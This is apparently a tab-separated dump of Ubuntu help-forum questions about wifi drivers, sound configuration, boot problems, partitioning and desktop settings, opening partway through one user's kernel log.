freq 2467 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 26.242015 ] cfg80211 : disabling freq 2472 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 26.242034 ] cfg80211 : disabling freq 2484 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 26.242365 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 26.242916 ] cfg80211 : pending regulatory request , waiting for it to be processed ... [ 26.351209 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 26.354357 ] usbcore : registered new interface driver rtl8192cu [ 26.890970 ] udevd [ 271 ] : renamed network interface wlan0 to wlan1 [ 27.428810 ] init : udev-fallback-graphics main process ( 499 ) terminated with status 1 [ 27.502462 ] rtl8192cu : mac auto on okay ! [ 27.557706 ] rtl8192cu : tx queue select : 0x05 [ 27.560618 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cufw.bin [ 28.301232 ] addrconf ( netdev_up ) : wlan1 : link is not ready [ 28.739235 ] init : isc-dhcp-server pre-start process ( 536 ) terminated with status 127 [ 43.829532 ] wlan1 : authenticate with 84:1b:5e : ee : cd:8c ( try 1 ) [ 43.832231 ] wlan1 : authenticated [ 43.834082 ] wlan1 : associate with 84:1b:5e : ee : cd:8c ( try 1 ) [ 43.839932 ] wlan1 : rx assocresp from 84:1b:5e : ee : cd:8c ( capab=0x411 status=0 aid=3 ) [ 43.839980 ] wlan1 : associated [ 43.858354 ] addrconf ( netdev_change ) : wlan1 : link becomes ready [ 54.338125 ] wlan1 : no ipv6 routers present when it fails to connect to my mifi ( configured as an open network ) : [ 20.060175 ] cfg80211 : calling crda to update world regulatory domain [ 20.905690 ] rtl8192cu : mac address : 00 : e0:4c:09:25:15 [ 20.905740 ] rtl8192cu : board type 0 [ 21.561046 ] rtlwifi : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 [ 21.561093 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 21.561119 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561137 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 21.561159 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561176 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 21.561198 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561215 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 21.561237 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561254 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 21.561276 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561293 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 21.561314 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561331 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 21.561352 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561370 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 21.561391 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561408 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 21.561430 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561447 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 21.561469 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561485 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 21.561507 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 21.561525 ] cfg80211 : disabling freq 2467 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 21.561544 ] cfg80211 : disabling freq 2472 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 21.561563 ] cfg80211 : disabling freq 2484 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 21.561894 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 21.562460 ] cfg80211 : pending regulatory request , waiting for it to be processed ... [ 22.324375 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 22.327427 ] usbcore : registered new interface driver rtl8192cu [ 22.782272 ] udevd [ 264 ] : renamed network interface wlan0 to wlan1 [ 23.326273 ] init : udev-fallback-graphics main process ( 497 ) terminated with status 1 [ 34.190986 ] rtl8192cu : mac auto on okay ! [ 34.224398 ] rtl8192cu : tx queue select : 0x05 [ 34.225925 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cufw.bin [ 34.741921 ] addrconf ( netdev_up ) : wlan1 : link is not ready does anyone have any ideas here ? thanks !
230336	sound issues after trying everything	i can not get my sound working properly , no matter what i do , there 's always some problem . it 's very annoying as it 's the only thing preventing me from making ubuntu my main os . at the moment my sound always plays through both my speakers and my headphones regardless except the sound through the headphones is crackly . it is also a bit quiet even though everything is maxed . i 've managed to improve the situation to a point where the sound out of my speakers is perfect but i have none at all from my headphones . i do have two connectors listed in the sound settings but regardless of which one is selected it always plays through the speakers . i think this might have something to do with the fact that my speakers are plugging into the front of my computer , typically the headphone jack , and my headphones are plugging into the back but when i try disconnecting the speakers from the front there is still no sound from the headphones . i fixed the speaker sound by going through the sound settings and making sure they were all set to 100 % then rebooting . things i have tried : maxing everything and unmuting everything in alsamixer uninstalling pulseaudio making gstreamer use only alsa via gstreamer-properties . this worked with the sound test button including independent sound between headphones and speakers but when i reset the computer it no longer worked . so i tried setting it manually in gconf-editor which did n't work either . reinstalling alsa and pulseaudio setting the model in /etc/modprobe.d/alsa-base.conf to 6stack and 6stack-dig neither worked . upgrading to 12.10 here 's some command output to help you diagnose my problem . aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : ad198x headphone [ ad198x headphone ] subdevices : 1/1 subdevice # 0 : subdevice # 0 sudo lshw -c sound *-multimedia description : audio device product : 82801ji ( ich10 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:70 memory : f7ff8000-f7ffbfff cat /proc/asound/card*/codec* | grep `` codec '' codec : analog devices ad1989b cat /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 options snd-hda-intel model=6stack
230338	just installed ubuntu with windows ( dell dimension 4700 ) trying to get wifi connection what do i do ?	any help would be appreciated how do i get wireless connection on ubuntu 12.10 on my dell dimention 4700 ?
230349	how to add background image in nautilus 3.4.2	i am using ubuntu 12.04 and i want to know how to add image to nautilus background . i know there is a way to change it by editing the nautilus.css file but is there any graphical way to do it . another thing i noticed that many themes dont have the nautilus.css file . if there is no graphical way then please tell me how can i change the background for all themes . nautilus version is 3.4.2
230352	edubuntu ltsp client desktop management	i am working with edubuntu to create a ltsp server . i need to have control over the desktops of the client as this will be implemented in a school environment . i have several ltsp 4 servers running on centos with kde 3.5 using the kioskadmintool to manage the desktops . is there similar functionality with edubuntu and ltsp 5 ? is is consolidated in a convenient tool or do i need several tools to manage it ? i do not need to stay with kde . thanks .
230356	how to connect via ssh from virtualbox to windows	i 'm running ubuntu in virtualbox and i want to connect via ssh to host ( windows 7 ) . is it possible ? i need someone to explain me .
230358	problems creating a desktop entry for a shell script	i did the following procedures to create a application launcher but it does n't work . create shell script named shell.sh with the following content : java -jar foo.jar added execution permission : sudo chmod +x shell.sh created .desktop file in /usr/share/applications/ with the content : [ desktop entry ] name=foo terminal=false exec=/path/shell.sh type=application icon=/path/icon.png categories=utility ; then i have an application with icon , but it could n't run , while double click shell.sh works . what 's wrong ?
230361	increase sensitivity of a touchpad with the synaptics driver	what settings do i need to tweak in order to increase the sensitivity of my touchpad in synaptics ? $ synclient parameter settings : leftedge = -2393 rightedge = 2651 topedge = -2030 bottomedge = 2139 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 346 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 100 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 157 horizscrolldelta = 157 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0253743 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 630 edgemotionusealways = 0 updownscrolling = 1 leftrightscrolling = 1 updownscrollrepeat = 1 leftrightscrollrepeat = 1 scrollbuttonrepeat = 100 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 0 tapbutton2 = 0 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 4 verthysteresis = 4 clickpad = 1 rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 when i move my finger slowly , i have to swipe multiple times to get around the screen . when i swipe really quickly , it can easily span the whole display , but i 'd like to increase the general sensitivity .
230362	how can i parse a youtube url ?	how do i extract only http : //www.youtube.com/watch ? v=qdraf3-oeh4 from a url like http : //www.youtube.com/watch ? v=qdraf3-oeh4 & playnext=1 & list=pl4367cedbc117aec6 & feature=results_main i am only interested in the `` v '' parameter .
230370	deluge torrent client says `` no incoming connection ''	deluge is not connecting in my ubuntu 12.04 , whereas transmission is . i have no firewall restriction/forward configured as far as i know , the port deluge uses ( 60233 ) is successfully tested by deluge , and by http : //canyouseeme.org/ : success : i can see your service on 94.109.x.x on port ( 60223 ) your isp is not blocking port 60223 the error deluge displays varies : mostly no incoming connection , sometimes error : host not found ( authoritative ) -for ubuntu.com tracker- , often timeout ( simultaneously to no incoming connection ) . as this seems to be no network issue ( since transmission connects & downloads just fine ) , but more a deluge specific problem : where should i look for problem ? and how to solve it ?
230386	automount smb share customization	as a new linux user , used ubuntu 12.10 , i tried several tweaks with the smb shares . i followed this tutorial to mount permanently 4 smb shares from my local nas . to resume , i : edit /etc/fstab added a line like : //servername/sharename /media/windowsshare cifs credentials=/home/ubuntuusername/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 created a credentials file for security reasons in my home folder ( explained in the tutorial ) ~/.smbcredentials it work perfectly , they are automounted on each reboot , but when i logon , i all the time get 4 file explorer open with each share . it is possible to avoid these file explorer window to be opened on every reboot ? i guess it 's related to x or via a explicit deny or these graphical mount , but i do n't have any clues on how to proceed thank you for your time ,
230389	reduce pdf file by factor of two	i have completed my thesis . i used latex to write and the total output size of my pdf is ~100mb . it contains a lot of figures ( jpg photos , tikz pictures , pdf images ) , hyperlinks , references etc . my university requires to upload my thesis in a pdf file at maximum 50 mb . so i need to reduce my thesis-in size-without losing any quality . is there a way to do so ?
230393	ubuntu 12.10 wine crash error help	i 'm trying to get wine to work for hawken . i used winetricks and installed all the necessary components . wine works fine with other games i have installed but when i try to run hawken it crashes while loading with the following error : fixme : iphlpapi : cancelipchangenotify ( overlapped 0xf2afb8 ) : stub i 'm new to ubuntu so i have no idea how to fix this . any help would be much appreciated . *update : i 've done some backtracking and it seems that this error is caused by the launcher not wine itself .
230394	jumping login box after lighdm multiple monitor workaround	so i used this workaround to sort my resolution at the login screen when using multiple monitors with lightdm . # ! /bin/bash xcom0=`xrandr -q | grep 'vga1 connected'` xcom1=`xrandr -- output lvds1 -- primary -- auto -- output vga1 -- auto -- right-of lvds1` xcom2=`xrandr -- output lvds1 -- primary -- auto` # if the external monitor is connected , then we tell xrandr to set up an extended desktop if [ -n `` $ xcom0 '' ] || [ ! `` $ xcom0 '' = `` '' ] ; then echo $ xcom1 # if the external monitor is disconnected , then we tell xrandr to output only to the laptop screen else echo $ xcom2 fi exit 0 ; found here : how to force multiple monitors correct resolutions for lightdm ? it works great . however , now when i am on my login screen , the login box seems to jump to between the two displays . any advice as to how i could make it stay on one display ? thanks
230395	wifi is painfully slow , sometimes stops altogether	lately my wifi connection has been quite slow , and sometimes i lose my internet connection altogether ( but the computer does not actually disconnect from the wifi network ) . this only affects my laptop and only when it 's running ubuntu , so i think it must be a problem with ubuntu . i have n't changed anything recently ; this is on 12.10 64-bit . what could it be ? update : it 's doing this now . the connection is n't completely dead , it 's just staying under 5 kb/s . still frustrating though . it also seems to affect all users . update 2 : output from sudo lspci -- n : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 8 [ 8086:1c1e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 09:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) 0b:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) it 's not happening right now ; it seems to start & stop at random . also , i 've had ubuntu on this computer and used this network for a while now . i do n't think it 's a driver issue , although i 'm not sure what else it could be . update 3 : i disabled ipv6 as alex suggested , and it 's worked ever since . that may have solved it ; i 'll wait and see if it keeps working for the rest of the day .
230396	can i prevent an identify packet device command to a specific device at boot ?	this is related to a previous question related to installation that is now resolved . i 'm opening a new question , because i still need to get my dvd drive working . problem : failed boot when my asus drw-24b1/st dvd drive is attached to my asmedia asm1061 . symptom : ata8.00 : exception emask 0x52 sact 0x0 serr 0xffffffff action 0xe frozen ata8 : serror : { blah blah } ata8.00 : failed command : identify packet device ata8.00 : cmd blah blah res blah blah ( ata bus error ) ata8.00 : status : { drdy } ata8 : hard resetting link background : the asm1061 is a pcie to sata bridge providing 2 x 6gb/s ports and is supposed to be fully compliant to sata specs . i just discovered in the fine print of my asus p8z77-v pro motherboard that `` these sata ports are for data hard drivers only . atapi devices are not supported . '' however , i have already installed windows 7 using this drive and i can run the ubuntu 12.04 installer from it as well . the only time i have a problem is during ubuntu boot when it tries an identify packet device which seems to be an atapi command . i ca n't simply switch this device to another sata port because they are already allocated to other devices . ( my chipset 's 2 x 6gb/s are connected to my boot ssd and a fast hdd while the 4 x 3gb/s ports are running a raid 5 array . ) if this ca n't be fixed or worked around , i suppose i 'll have to go buy sata add-in card . blech . thoughts : if indeed this is a device specific issue ( that it does n't support atapi discovery ) then i ca n't expect - is it udev ? - to work with it . but , it seems that windows and even the ubuntu installer work just fine . so why does udev have a problem ? at the end of the day , it would be nice to have the dvd working under ubuntu , but i can live without it . but , as this is a dual-boot machine , i ca n't physically disconnect it because i want it to work with windows . ( and physically disconnecting it every time i want to boot ubuntu is not an option . ; - ) questions : should this be considered a bug ? my feelings are that if it works with other os that it should probably work with ubuntu as well . how can i work around this problem ? i have a limited knowledge of linux internals , but it seems i should be able to somehow tell udev ( or whatever is doing the discovery ) to ignore that device . is there a way ?
230402	disabling eth0 module on a macbook aluminum	the ubuntu page for my device states the following at the bottom ( known issues ) powertop reports that the module for the 10/100/1000 interface wakes the processor 100+x/sec , accounting for > 50 % of wakeups on an idle system . this dramatically shortens battery life . one potential solution is to unload this module if you only use wireless . i only use wireless , but i could not find instructions to `` unload the module '' . i have a feeling if i try something related to this , but not the same , battery life will not improve and my eth0 wo n't work . anyone have a good guide on this ?
230403	what is the most reliable wifi card ?	which wifi card is most reliable with ubuntu , in particular v12.04 ? i have a asus pce-n15 card which is dropping out intermittently . it has the rtl8188ce chipset , and i see that plenty of others have had a problem with this same chipset . i have tried building the custom drivers and a few other fixes , but still not reliable . so , i need to race out another card asap , but which card to buy ? ( i do n't just want to select from the ubuntu components list , since it is not infallible . for example , it says the rtl8188ce chips set works ) . thanks !
230405	disable automount in nautilus to avoid mount-devices being listed twice in nautilus	i have added my mount devices in /etc/fstab and they get correctly mounted ( 2nd partition with ntfs and nas-share with nfs ) . i have also disabled automount in nautilus preferences by using dconf-editor ( following this post ) : user @ server : ~ $ gsettings list-recursively org.gnome.desktop.media-handling org.gnome.desktop.media-handling automount false org.gnome.desktop.media-handling automount-open false org.gnome.desktop.media-handling autorun-never false now i see every mount device twice in nautilus ( the entry in fstab already mounted ) . when clicking on the other entry i get the eligible message mount.nfs : /media/nas_share is busy or already mounted how i can i disable the appearente of those devices in nautilus ? edit regarding automount : i have only one line in /etc/auto.master : +auto.master
230407	installing 12.10 on dell r710	i have been trying to install ubuntu 12.10 on a dell r710 . i have 6 disks in each 2 tb . i setup a raid 5 in the hw raid controller with all drives , and proceeded with the os install . when the partitioner runs it fails to create / for some reason . i then tried just setting up a simple raid 1 with 2 drives in the hw controller , and doing the os install again . the installer runs fine this time . once trying to boot i then get a kernel panic of 'target file system does n't have requested /sbin/init ' as well as a bunch of 'deleted inode referenced ' . can someone tell me what i am doing wrong here ?
230408	hard drive skipped in boot	good evening . i just installed ubuntu 12.04 using a usb , but right after the install , after restarting the machine , i get a message asking me to insert a bootable drive . my boot settings in bios have the hard drive first , then dvd , then usb stick , and i have two systems installed , windows 7 and ubuntu 12.04 . i suspected the hard drive got somehow disconnected internally , so i checked but everything was in place . i used the live usb to start ubuntu , and i could see the hard drive and mount whatever partition i wanted . the one that contains the recently installed ubuntu , looks the same . ( it has n't been deleted or anything ) . i 'm not sure if this is a hardware problem or a loader ( grub ) problem , because the hard drive is visible . only it is n't seen by the bios . my only means of internet connection is a usb modem , which does n't work when i 'm using the live usb , so i have ca n't download anything from the internet , in case someone asks . i also reinstalled ubuntu 12.04 , to no avail . this is my second problem with this laptop , and ubuntu , and it 's not even a week old . i hope this one gets solved . thank you .
230410	graphic problems after installation of 12.04	i installed ubuntu 12.04 alongside windows xp . the problem is that i can not see the bootloader menu to choose xp anymore . my monitor shows the the message : optimal mode 1440x990 60hz . after a while ubuntu starts and i can see the unity screen . i have an onboard graffic : nvidia cooporation c61 [ geforce 6100 nforce 405 ] ( rev a2 ) how can i fix that problem ?
230411	booting error while using 12.04 booting from grub	my name is paul . i have encountered an issue relating to grub booting and the booting process in general . i have been running ubuntu 12.04 lts on my machine for quite a while . before that , i had ( before ) 10.04 , 11.04 , 11.10 , etc . i have been running ubuntu , in general , but more specifically 12.04 for a long time with little to no problems . the problem : earlier today , i was using my machine and then decided to take a little break . i shut down my machine ( laptop , in case anyone was wondering ) and left . later , i came back ready to start it up and continue . i started it up and it took me to the toshiba screen ( like normal ) then to the grub screen . i guessed that nothing was truly wrong , and chose the first option ( something around the lines of : ubuntu , with linux 3.22.0-35-generic ) . i waited for a bit and it still displayed the same purple screen . i restarted it and now chose the option like the first but with recovery at the end . same result . later , i waited longer and found that my computer came up with a bunch of lines of script . i waited longer but nothing new happened . what are your suggestions as to fix this problem ? i will let my computer run overnight with the recovery setting and will let you know what the result is . until then , please help . thank you , your time and effort is greatly appreciated !
230412	wireless not working with intel corporation centrino wireless-n 1000 ?	title says pretty much all . ubuntu v.12.10 . i 'm an absolute linux newbie , so i can say much more than this . but please , let me know what info to provide and how and i 'll make the necessary edits .
230416	discussion regarding upgrading to 12.1 is confusing	i use 12.04 and i install all the interim upgrades as they are offered.i see no reason to upgrade to 12.10 but when will i know 12.04 is no longer supported ? i will appreciate a correction to my understanding if necessary but please be non technical
230418	fail to upgrade from 10.10 to 11.04	i was using natty for a while , but while updating to the new release there was a blackout and it was n't able to finish and ubuntu failed to load after that . i thought , no worries i got my files backed up and i still got my 10.10 cd i used to put ubuntu in my computer in the first place . so i installed it again , with the plan of using the update manager to get myself with the current release ... except i get this error : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . my internet connection is just fine , seeing as i 'm able to post this , but i do n't know what else to do . tried to download quantal in another computer and putting it on a dvd ( since it wo n't fit in a cd ... ) and the stupid thing fails to load it , it skips it over and goes right back to maverick ... ( not a faulty disk , it installed ubuntu just fine in a friends computer ... )
230421	changed profiles ; lost ubuntu ; how do i get it back ?	installed ubuntu-secure-remix 12.10 in a dual boot with windows 8 on an hp laptop . a first-time linux user , i was exploring settings when i changed profiles ( not sure what i changed it to ) . now the linux boots into what i believe is the shell . i can still log in ( that is , i am already a user - so that 's still there ) . due possibly to using refind , i can not figure how to run ubuntu in recovery mode . how can i get ubuntu back up and running again ? thanks in advance .
230425	visual glitches in windows games	so first , i 'm pretty fresh to ubuntu . now i wanted to play some windows titles on ubuntu so i got wine , installed it , installed the games , all cool . but then , both titles ( cod mw1 and mw2 ) are suffering from some kind of a glitch which causes some colorful flashing ( i.e . blue flames , or black flashing rpg smoke ) when the game attempts to render smoke or fog effects . i updated the drivers ( geforce gtx260 ) to the very newest version - 304.64 - but the problem persists . i also have installed directx9 - same . any ideas what could possibly be missing ?
230428	3 os 's on same hdd	i 've been all day around my laptop and just ca n't make it work , i have one hdd 750 gb in size , and i would like to have the following partition table : 60 gb - windows 7 150 gb - windows 8 150 gb - ubuntu 12.10 390 gb ( rest ) - logical drive for files however for some reason ( and i start by installing windows because i want grub for boot menu ) it is not possible to begin the installation with this table and the problem is i can not have more than four partitions on same disk , since windows automatically creates that annoying 100 mb extra partition . so after many many trial - error installations and partitioning i got this : part1 : 100 mb - windows ( auto created ) part2 : 60 gb - windows 7 installed part3 : extended partition with 3.1 : part5 150 gb - > windows 8 installed 3.2 : part6 360 gb - > logical for files 3.3 : part7 8 gb - > swap 3.4 : part8 160 gb - > ubuntu 12.10 all os 's were successfully installed i can see every partition 's content on ubuntu . since ubuntu was installed last i managed to have grub , which shows windows 8 ( fails to boot when selected : 'error reading disk ' ) , windows 7 does n't show at all , and ubuntu seems pretty fine to me . is there any way to make this work ? i searched everywhere can only find dual boot solutions ... i do n't mind having to reinstall everything again . output of sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x44ae409c device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 127066111 63429632 7 hpfs/ntfs/exfat /dev/sda3 127068158 1465142699 669037271 f w95 ext 'd ( lba ) partition 3 does not start on physical sector boundary . /dev/sda5 * 127068160 423938047 148434944 7 hpfs/ntfs/exfat /dev/sda6 423940096 1132926975 354493440 7 hpfs/ntfs/exfat /dev/sda7 1132929024 1149175807 8123392 7 hpfs/ntfs/exfat /dev/sda8 1149177856 1465142699 157982422 7 hpfs/ntfs/exfat disk /dev/sdb : 7948 mb , 7948206080 bytes 245 heads , 62 sectors/track , 1021 cylinders , total 15523840 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006d557 device boot start end blocks id system /dev/sdb1 * 62 15508989 7754464 b w95 fat32 thanks
230433	how to set a value of kconfig option	i want to change the value of a specific config_ ... parameter ( in here : config_ath5k_debug ) inside kconfig option . i use make menuconfig command , press / and type config_ ... to find its location . then i go there , change the value and exit > save configuration . but it does n't make any effects . i see in the terminal : end of the configuration . execute 'make ' to start the build or try 'make help ' . so what is the point here ? do i have to run the make command to make effects ? but everytime i run make command , there are always errors . please help me !
230434	what is the file extension for things in the /bin folder ?	i was looking at stuff like /bin/bash , and i wanted to make my own file like that that 's full of aliases , but i need to know the file extension . please tell me .
230435	how to use eth1 as failsafe system for eth0 ?	how to configure eth1 to be a failsafe system for eth0 . when eth0 is down eth1 goes up , and when eth0 is up eth1 goes down
